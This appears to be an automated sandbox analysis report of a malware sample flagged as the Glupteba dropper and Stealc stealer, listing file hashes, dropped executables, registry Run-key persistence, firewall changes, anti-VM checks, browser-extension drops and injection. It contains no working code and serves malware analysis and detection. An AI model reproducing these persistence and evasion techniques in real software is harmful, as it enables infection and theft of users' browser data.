SHA512 5e4a05added9a614dcc0b89ecc96e0bdcb33ef8ab5a66a4a096eaf697efae201f22de9f6c5f65a2fe7239f995670ab5d7e00fd6556a48b7a2eb9f2d4e830f9cc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7d47ee664a4e49a2e157c928bdceef3e
SHA1 aca2efcbd04ab7cffd04e31228d3192692f7b82b
SHA256 7ccee053dc9cbc1b6537c0eba8f93e448566c6ba347fb8cb31e6a58a35aa3f4f
SHA512 f56992cfcb5caf9567623b8451ebaeeaa2f0790ac1fe30f0b1509033ac934f72f7ebbc8e573e3bdce5e2d38ee99a8f89a6658cba7da5d6243aa9b0302476f31f

Analysis: behavioral2

Detonation Overview

Submitted 2024-04-19 14:04

Reported 2024-04-19 14:07

Platform win11-20240412-en

Max time kernel 149s

Max time network 151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A

Stealc

stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vLxMkquwj2YLyeMbPWIrM04m.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lma0w8jNTTBEKB4j2ImfhlKl.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BJcupLuUarzm5XXQzG6ujYry.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9XtibT4Yf4gH04TbrqAhIOG1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e3y42iPJ08drhXOmj3ez4uBU.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BwNhJ3ZI8lFiFlan3IJP72hk.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iLLA17oZmuYEQ42ykMCFYANl.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4vHWCNg1n0gUuFSrnQ517HiF.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe N/A
N/A N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
N/A N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
N/A N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe N/A
N/A N/A C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
N/A N/A C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4960 set thread context of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\RVqmAwyyxwiU2\LHvjJyj.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\GaDkQze.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\FaYwZcq.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\ARTXeDTAxvUn\ILNjVYD.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\ByWuwrOBU\WnleIRa.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\DUGaRsFaSnqjC\qaeykIa.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\DUGaRsFaSnqjC\OTNmBJT.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\ByWuwrOBU\ojTVpK.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\RVqmAwyyxwiU2\BoPjNTTVXpgKP.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\Tasks\QhciBzJOokLnyYZub.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\Tasks\qbSDwEgyNYPZlGA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
File created C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\Installer\e5991a7.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5991a7.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\bWycNackLSywaqkmgR.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
